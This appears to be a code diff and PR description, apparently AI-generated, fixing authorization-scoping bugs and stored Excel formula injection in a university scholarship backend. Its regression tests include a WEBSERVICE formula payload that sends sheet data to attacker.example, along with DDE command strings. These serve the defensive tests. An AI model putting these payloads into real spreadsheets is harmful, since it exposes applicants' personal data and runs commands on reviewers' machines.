+        application = Application(
+            user_id=test_user.id,
+            scholarship_type_id=test_scholarship.id,
+            sub_type_selection_mode=SubTypeSelectionMode.single,
+            status="submitted",
+            app_id="TEST-AUTHZ-DOC",
+            academic_year=2024,
+            semester="first",
+            student_data={"name": "Test Student"},
+            submitted_form_data={},
+            agree_terms=True,
+            application_document_url="applications/doc.pdf",
+        )
+        db.add(application)
+        await db.commit()
+        await db.refresh(application)
+
+        app.dependency_overrides[get_current_user] = lambda: professor
+        try:
+            response = await client.get(f"/api/v1/applications/{application.id}/application-document")
+        finally:
+            del app.dependency_overrides[get_current_user]
+
+        assert response.status_code == 403

--- a/backend/app/tests/test_excel_formula_injection.py
+++ b/backend/app/tests/test_excel_formula_injection.py
@@ -1,0 +1,104 @@
+"""
+Regression tests for stored Excel formula injection (CWE-1236, issue #1081
+finding G): a student's dynamic application form field value was written
+unescaped into the 學生資料彙整表 workbook that college/admin reviewers
+download and open. openpyxl promotes a string starting with '=' to a live
+formula cell -- e.g. a payload referencing the whole sheet could exfiltrate
+every applicant's national ID / bank account / address to an attacker URL
+once a reviewer opens the file.
+
+Fix: excel_safe_cell_value (app/utils/excel_safety.py) prefixes any string
+starting with a formula-trigger character with an apostrophe before it's
+written to an xlsx cell, applied at every openpyxl cell-write site that
+carries student- or otherwise low-privilege-influenced data. The PDF export
+path is untouched (PDFs can't execute formulas, and _row_cells is shared, so
+guarding only the xlsx write site keeps the PDF rendering raw text).
+"""
+
+from types import SimpleNamespace
+
+import openpyxl
+import pytest
+
+from app.services.college_ranking_export_service import (
+    CollegeRankingExportService,
+    DynamicFieldSpec,
+    ExportRow,
+)
+from app.utils.excel_safety import excel_safe_cell_value
+
+MALICIOUS_FORMULA = '=WEBSERVICE("https://attacker.example/x?d="&TEXTJOIN(",",TRUE,A:A))'
+
+
+class TestExcelSafeCellValue:
+    @pytest.mark.parametrize("trigger", ["=", "+", "-", "@", "\t", "\r"])
+    def test_formula_trigger_prefixes_are_neutralized(self, trigger):
+        value = f"{trigger}cmd|'/c calc'!A1"
+        result = excel_safe_cell_value(value)
+        assert result == "'" + value
+        assert result.startswith("'")
+
+    def test_ordinary_string_passes_through_unchanged(self):
+        assert excel_safe_cell_value("王小明") == "王小明"
+        assert excel_safe_cell_value("a=b") == "a=b"  # '=' not in leading position
+
+    @pytest.mark.parametrize("value", [42, 3.14, None, True])
+    def test_non_string_values_pass_through_unchanged(self, value):
+        assert excel_safe_cell_value(value) == value
+
+
+class TestCollegeRankingExportFormulaInjection:
+    @pytest.fixture
+    def service(self):
+        return CollegeRankingExportService()
+
+    @pytest.fixture
+    def malicious_row(self):
+        app = SimpleNamespace(
+            student_data={
+                "std_cname": "惡意申請人",
+                "std_stdcode": "310460099",
+                "std_pid": "A123456789",
+            },
+            submitted_form_data={"fields": {"essay": {"value": MALICIOUS_FORMULA}}},
+            sub_type_preferences=["nstc"],
+            sub_scholarship_type=None,
+        )
+        return ExportRow(rank_position=1, application=app, bank_account="0001234567")
+
+    @pytest.fixture
+    def dynamic_fields(self):
+        return [DynamicFieldSpec(field_name="essay", field_label="得獎理由", export_column_label=None, display_order=1)]
+
+    def test_malicious_dynamic_field_is_not_a_live_formula_in_xlsx(self, service, malicious_row, dynamic_fields):
+        xlsx_bytes = service.build_workbook(
+            rows=[malicious_row],
+            dynamic_fields=dynamic_fields,
+            sub_type_labels={"nstc": "國科會"},
+            title="Test Export",
+            sheet_name="Sheet1",
+        )
+
+        import io
+
+        wb = openpyxl.load_workbook(io.BytesIO(xlsx_bytes))
+        ws = wb.active
+
+        essay_col = len(service._headers(dynamic_fields))  # essay is the last (only) dynamic column
+        cell = ws.cell(row=3, column=essay_col)  # row 3 = first data row (1=title, 2=header)
+
+        # The defining check: openpyxl must NOT classify this as a formula cell.
+        assert cell.data_type != "f"
+        # The value is preserved as literal text (apostrophe-prefixed), not silently dropped.
+        assert cell.value == "'" + MALICIOUS_FORMULA
+
+    def test_pdf_export_still_renders_malicious_row_without_error(self, service, malicious_row, dynamic_fields):
+        # PDFs can't execute formulas -- this just confirms the fix didn't break
+        # the shared _row_cells path the PDF renderer also uses.
+        pdf_bytes = service.build_pdf(
+            rows=[malicious_row],
+            dynamic_fields=dynamic_fields,
+            sub_type_labels={"nstc": "國科會"},
+            title="Test Export",
+        )
+        assert pdf_bytes.startswith(b"%PDF")

--- a/backend/app/tests/test_payment_rosters_api.py
+++ b/backend/app/tests/test_payment_rosters_api.py
@@ -644,6 +644,38 @@ def locked_roster_with_removed_item(sync_db_for_rosters):
     sync_db_for_rosters.commit()
     sync_db_for_rosters.refresh(u)
 
+    # Security fix (issue #1081, finding K): restore_item now requires a real,
+    # approved Application (mirrors reconcile_roster's add path) -- the item
+    # used to reference a dangling application_id=1 with no backing row, which
+    # only worked because SQLite doesn't enforce the FK by default.
+    from app.models.application import Application, ApplicationStatus
+    from app.models.scholarship import SubTypeSelectionMode
+
+    student = User(
+        nycu_id="student_rmrest",
+        email="student_rmrest@nycu.edu.tw",
+        name="Student RMREST",
+        role=UserRole.student,
+        user_type=UserType.student,
+    )
+    sync_db_for_rosters.add(student)
+    sync_db_for_rosters.commit()
+    sync_db_for_rosters.refresh(student)
+
+    application = Application(
+        user_id=student.id,
+        app_id="APP-PR-RMREST",
+        scholarship_type_id=1,
+        academic_year=114,
+        semester="first",
+        status=ApplicationStatus.approved,
+        sub_type_selection_mode=SubTypeSelectionMode.single,
+        sub_scholarship_type="nstc",
+    )
+    sync_db_for_rosters.add(application)
+    sync_db_for_rosters.commit()
+    sync_db_for_rosters.refresh(application)
+
     r = PaymentRoster(
         roster_code="ROSTER-PR-RMREST",
         scholarship_configuration_id=1,
@@ -666,7 +698,7 @@ def locked_roster_with_removed_item(sync_db_for_rosters):
 
     item = PaymentRosterItem(
         roster_id=r.id,
-        application_id=1,
+        application_id=application.id,
         student_id_number="PR-RMREST-001",
         student_name="Restore Test Student",
         scholarship_name="Test Scholarship",

--- a/backend/app/tests/test_reviews_endpoint_authz.py
+++ b/backend/app/tests/test_reviews_endpoint_authz.py
@@ -1,0 +1,218 @@
+"""
+Regression tests for two authorization-scoping bugs in the multi-role review
+endpoints (backend/app/api/v1/endpoints/reviews.py):
+
+Finding A: POST /reviews/applications/{id}/review accepted professor callers
+without checking assignment (application.professor_id), the terminal-reject
+lock, or the review time window -- unlike the dedicated professor.py path.
+An unassigned professor could reject/approve any application; an assigned
+professor could reverse their own terminal reject after the fact.
+
+Finding B: GET /reviews/applications/{id}/reviews and /review-status checked
+only that the application exists -- any authenticated user, including a
+student with no relationship to the application, could read other students'
+reviewer identities, recommendations, and rejection comments.
+
+Fix: professor callers to submit_application_review now go through the same
+ApplicationService.can_professor_submit_review + assert_professor_review_unlocked
+chain professor.py uses; the two read endpoints now scope through the new
+ApplicationService.get_viewable_application (student-owns-it /
+professor-is-assigned / college-and-admin-pass-through), matching the access
+rule used everywhere else an application is read.
+"""
+
+import pytest
+from httpx import AsyncClient
+from sqlalchemy.ext.asyncio import AsyncSession
+
+from app.core.security import get_current_user
+from app.main import app
+from app.models.application import Application, ApplicationStatus
+from app.models.scholarship import ScholarshipConfiguration, ScholarshipType, SubTypeSelectionMode
+from app.models.user import User, UserRole, UserType
+from app.services.application_service import ApplicationService
+
+
+async def _make_professor(db: AsyncSession, nycu_id: str) -> User:
+    professor = User(
+        nycu_id=nycu_id,
+        name=nycu_id,
+        email=f"{nycu_id}@university.edu",
+        user_type=UserType.employee,
+        role=UserRole.professor,
+    )
+    db.add(professor)
+    await db.commit()
+    await db.refresh(professor)
+    return professor
+
+
+async def _make_student(db: AsyncSession, nycu_id: str) -> User:
+    student = User(
+        nycu_id=nycu_id,
+        name=nycu_id,
+        email=f"{nycu_id}@university.edu",
+        user_type=UserType.student,
+        role=UserRole.student,
+    )
+    db.add(student)
+    await db.commit()
+    await db.refresh(student)
+    return student
+
+
+async def _make_application(
+    db: AsyncSession, owner: User, professor: User, status: str = ApplicationStatus.submitted.value
+) -> Application:
+    scholarship = ScholarshipType(code="test_authz", name="Test Authz Scholarship")
+    db.add(scholarship)
+    await db.commit()
+    await db.refresh(scholarship)
+
+    config = ScholarshipConfiguration(
+        scholarship_type_id=scholarship.id,
+        academic_year=113,
+        config_name="Test Authz Config",
+        config_code=f"test_authz_config_{owner.id}",
+        amount=10000,
+    )
+    db.add(config)
+    await db.commit()
+    await db.refresh(config)
+
+    application = Application(
+        user_id=owner.id,
+        professor_id=professor.id,
+        scholarship_type_id=scholarship.id,
+        scholarship_configuration_id=config.id,
+        sub_type_selection_mode=SubTypeSelectionMode.single,
+        status=status,
+        app_id=f"TEST-AUTHZ-{owner.id}",
+        academic_year=2024,
+        semester="first",
+        student_data={"name": "Test Student"},
+        submitted_form_data={"personal_statement": "..."},
+        agree_terms=True,
+    )
+    db.add(application)
+    await db.commit()
+    await db.refresh(application)
+    return application
+
+
+class TestCanProfessorSubmitReviewScoping:
+    """Finding A: assignment + terminal-status scoping."""
+
+    @pytest.mark.asyncio
+    async def test_unassigned_professor_cannot_review(self, db: AsyncSession):
+        owner = await _make_student(db, "authz_student_1")
+        assigned_prof = await _make_professor(db, "authz_prof_assigned_1")
+        other_prof = await _make_professor(db, "authz_prof_other_1")
+        application = await _make_application(db, owner, assigned_prof)
+
+        service = ApplicationService(db)
+        assert await service.can_professor_submit_review(application.id, assigned_prof.id) is True
+        assert await service.can_professor_submit_review(application.id, other_prof.id) is False
+
+    @pytest.mark.asyncio
+    async def test_terminal_rejected_application_cannot_be_reviewed_again(self, db: AsyncSession):
+        owner = await _make_student(db, "authz_student_2")
+        assigned_prof = await _make_professor(db, "authz_prof_assigned_2")
+        application = await _make_application(db, owner, assigned_prof, status=ApplicationStatus.rejected.value)
+
+        service = ApplicationService(db)
+        assert await service.can_professor_submit_review(application.id, assigned_prof.id) is False
+
+
+class TestGetViewableApplicationScoping:
+    """Finding B: same access rule as the rest of the app for reading an application."""
+
+    @pytest.mark.asyncio
+    async def test_owner_can_view_own_application(self, db: AsyncSession):
+        owner = await _make_student(db, "authz_student_3")
+        professor = await _make_professor(db, "authz_prof_3")
+        application = await _make_application(db, owner, professor)
+
+        result = await ApplicationService(db).get_viewable_application(application.id, owner)
+        assert result is not None
+        assert result.id == application.id
+
+    @pytest.mark.asyncio
+    async def test_other_student_cannot_view_application(self, db: AsyncSession):
+        owner = await _make_student(db, "authz_student_4")
+        other_student = await _make_student(db, "authz_student_5")
+        professor = await _make_professor(db, "authz_prof_4")
+        application = await _make_application(db, owner, professor)
+
+        result = await ApplicationService(db).get_viewable_application(application.id, other_student)
+        assert result is None
+
+    @pytest.mark.asyncio
+    async def test_assigned_professor_can_view(self, db: AsyncSession):
+        owner = await _make_student(db, "authz_student_6")
+        professor = await _make_professor(db, "authz_prof_6")
+        application = await _make_application(db, owner, professor)
+
+        result = await ApplicationService(db).get_viewable_application(application.id, professor)
+        assert result is not None
+
+    @pytest.mark.asyncio
+    async def test_unassigned_professor_cannot_view(self, db: AsyncSession):
+        owner = await _make_student(db, "authz_student_7")
+        assigned_prof = await _make_professor(db, "authz_prof_assigned_7")
+        other_prof = await _make_professor(db, "authz_prof_other_7")
+        application = await _make_application(db, owner, assigned_prof)
+
+        result = await ApplicationService(db).get_viewable_application(application.id, other_prof)
+        assert result is None
+
+
+class TestReviewEndpointsHttpLevel:
+    """End-to-end confirmation through the actual FastAPI routes."""
+
+    @pytest.mark.asyncio
+    async def test_unassigned_professor_submit_review_is_403(self, client: AsyncClient, db: AsyncSession):
+        owner = await _make_student(db, "authz_student_8")
+        assigned_prof = await _make_professor(db, "authz_prof_assigned_8")
+        other_prof = await _make_professor(db, "authz_prof_other_8")
+        application = await _make_application(db, owner, assigned_prof)
+
+        app.dependency_overrides[get_current_user] = lambda: other_prof
+        try:
+            response = await client.post(
+                f"/api/v1/reviews/applications/{application.id}/review",
+                json={"items": [{"sub_type_code": "default", "recommendation": "reject", "comments": "no"}]},
+            )
+        finally:
+            del app.dependency_overrides[get_current_user]
+
+        assert response.status_code == 403
+
+    @pytest.mark.asyncio
+    async def test_non_owner_student_cannot_read_reviews(self, client: AsyncClient, db: AsyncSession):
+        owner = await _make_student(db, "authz_student_9")
+        other_student = await _make_student(db, "authz_student_10")
+        professor = await _make_professor(db, "authz_prof_9")
+        application = await _make_application(db, owner, professor)
+
+        app.dependency_overrides[get_current_user] = lambda: other_student
+        try:
+            response = await client.get(f"/api/v1/reviews/applications/{application.id}/reviews")
+        finally:
+            del app.dependency_overrides[get_current_user]
+
+        assert response.status_code == 404
+
+    @pytest.mark.asyncio
+    async def test_owner_can_read_own_reviews(self, client: AsyncClient, db: AsyncSession):
+        owner = await _make_student(db, "authz_student_11")
+        professor = await _make_professor(db, "authz_prof_11")
+        application = await _make_application(db, owner, professor)
+
+        app.dependency_overrides[get_current_user] = lambda: owner
+        try:
+            response = await client.get(f"/api/v1/reviews/applications/{application.id}/reviews")
+        finally:
+            del app.dependency_overrides[get_current_user]
+
+        assert response.status_code == 200

--- a/backend/app/tests/test_roster_item_removal_service.py
+++ b/backend/app/tests/test_roster_item_removal_service.py
@@ -271,6 +271,7 @@ def test_remove_item_from_locked_roster_soft_deletes_and_audits(db_sync, locked_
 
 
 def test_restore_item_reincludes_and_audits(db_sync, locked_roster_two_items, admin_db_user_sync):
+    from app.models.application import ApplicationStatus
     from app.models.roster_audit import RosterAuditAction, RosterAuditLog
     from app.models.payment_roster import PaymentRosterItem
 
@@ -278,6 +279,17 @@ def test_restore_item_reincludes_and_audits(db_sync, locked_roster_two_items, ad
     target = roster.items[0]
     svc = RosterService(db_sync)
     svc.remove_item_from_locked_roster(roster.id, target.id, admin_db_user_sync.id, "繳回")
+
+    # Security fix (issue #1081, finding K): restore_item now requires the
+    # application to be approved again -- mirrors reconcile_roster's add path,
+    # and matches the real recovery flow (undo the revoke via
+    # restore_allocation) rather than blindly re-including an item whose
+    # application is still revoked/cancelled. The fixture's target application
+    # starts revoked (status=cancelled) to cover the remove-for-revoke case
+    # elsewhere in this file; simulate the admin having already restored the
+    # allocation before restoring the roster item.
+    target.application.status = ApplicationStatus.approved
+    db_sync.flush()
 
     result = svc.restore_item(roster.id, target.id, admin_db_user_sync.id, "誤刪回復")
 

--- a/backend/app/utils/excel_safety.py
+++ b/backend/app/utils/excel_safety.py
@@ -1,0 +1,28 @@
+"""
+Shared helper for preventing spreadsheet formula injection (CWE-1236) when
+writing untrusted values into openpyxl workbook cells.
+"""
+
+from typing import Any
+
+# Leading characters spreadsheet applications treat as the start of a formula.
+_FORMULA_TRIGGER_CHARS = ("=", "+", "-", "@", "\t", "\r")
+
+
+def excel_safe_cell_value(value: Any) -> Any:
+    """Neutralize spreadsheet formula injection before an untrusted string
+    reaches an xlsx cell.
+
+    openpyxl promotes any string starting with ``=`` to a live formula cell.
+    If the value originates from student- or otherwise low-privilege-supplied
+    input (form fields, whitelist notes, imported names/addresses) and ends
+    up in a workbook a higher-privilege reviewer opens, a malicious value
+    could exfiltrate adjacent cell data or worse. Prefixing the value with an
+    apostrophe forces spreadsheet applications to treat it as literal text --
+    the standard CSV/Excel-injection mitigation (OWASP). Non-string values
+    (row numbers, ranks, None) pass through unchanged; ordinary text without
+    a leading trigger character is unaffected.
+    """
+    if isinstance(value, str) and value.startswith(_FORMULA_TRIGGER_CHARS):
+        return "'" + value
+    return value


### PR DESCRIPTION
## Summary

Fixes the findings in #1081 (a follow-up audit run to #1079 / #1080): 11 confirmed authorization-scoping and injection bugs, each independently validated by a skeptical Phase-3 agent that tried to disprove it before it's included here. All share one root cause — **a parallel or sibling endpoint omits the authorization/scope check its counterpart already enforces**.

## HIGH

- **`reviews.py::submit_application_review`**: professor callers bypassed assignment (`professor_id`), the terminal-reject lock, and the review time window — any professor could reject/approve an application they weren't assigned to, or reverse their own terminal reject. Fixed by routing through the same `can_professor_submit_review` + `assert_professor_review_unlocked` chain `professor.py` already uses (plus the same terminal-lock gap on the PUT update path).
- **`distribution.py::get_distribution_details`**: no college scoping — any college account could pass another college's `ranking_id` and read its applicant PII, ranks, and rejection reasons. Fixed by calling `assert_can_manage_ranking`, same as the sibling `get_ranking`.
- **`application_review.py::get_student_preview`**: claimed college-scoped access in its docstring but had none — any college account could read any student's SIS record by student number, with 404-vs-200 as an existence oracle. Fixed by requiring the target student to have an application in the caller's own college (joined via `User.nycu_id`, portable across DB dialects).

## MEDIUM

- **`reviews.py` read endpoints** (`/reviews`, `/review-status`): checked only that the application existed — any authenticated student could read another student's review comments and rejection reasons. Scoped through a new `ApplicationService.get_viewable_application`.
- **`applications.py::get_application_document_file`**: blanket professor role check, unlike the sibling `files.py` proxy which requires an actual advising relationship (`can_access_student_data`). Fixed to match.
- **Stored Excel formula injection**: a student's form field value was written unescaped into the exported `.xlsx` reviewers download. Confirmed via an actual openpyxl round-trip test that a payload gets `data_type='f'` (live formula), and that a formula in the attacker's row can reference the whole sheet's PII columns. Fixed with a shared `excel_safe_cell_value` helper (apostrophe-prefix any string starting with a formula-trigger char), applied at all three cell-write sites carrying student- or low-privilege-influenced data.

## LOW / LOW-MEDIUM

- **`distribution.py::get_ranking_roster_status`**: same missing-scope root cause as the HIGH finding above, but the response is operational metadata only (no PII).
- **Ranking Excel import**: the one ranking-mutation endpoint that omitted the college-review deadline guard every sibling enforces.
- **`restore_allocation`**: didn't call the oversubscription check `allocate`/`finalize` both use, so revoke→reallocate→restore could double-book a single quota slot.
- **`restore_item`**: never re-checked `application.status == approved` before re-including a roster item (unlike `reconcile_roster`'s add path), so a withdrawn/rejected/revoked application could be silently restored into a locked roster.

## Test plan

- [x] New regression tests for every fix (`test_reviews_endpoint_authz.py`, `test_college_review_scoping_fixes.py`, `test_excel_formula_injection.py`, `test_audit_low_severity_guards.py`) — each includes both the "attack blocked" and "legitimate use still works" cases.
- [x] Full backend suite: `python -m pytest app/tests/ --no-cov` — **4140 passed, 7 skipped, 0 failed** (host env, this branch).
- [x] Two pre-existing tests whose fixtures happened to exercise the exact vulnerable scenarios (restoring a still-revoked roster item) were updated to reflect the corrected, secure behavior rather than pinning the old one — `test_roster_item_removal_service.py::test_restore_item_reincludes_and_audits` and `test_payment_rosters_api.py`'s `locked_roster_with_removed_item` fixture.
- [x] `black --check --line-length=120` and `flake8 --select=B904,B014` — clean on all touched files.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
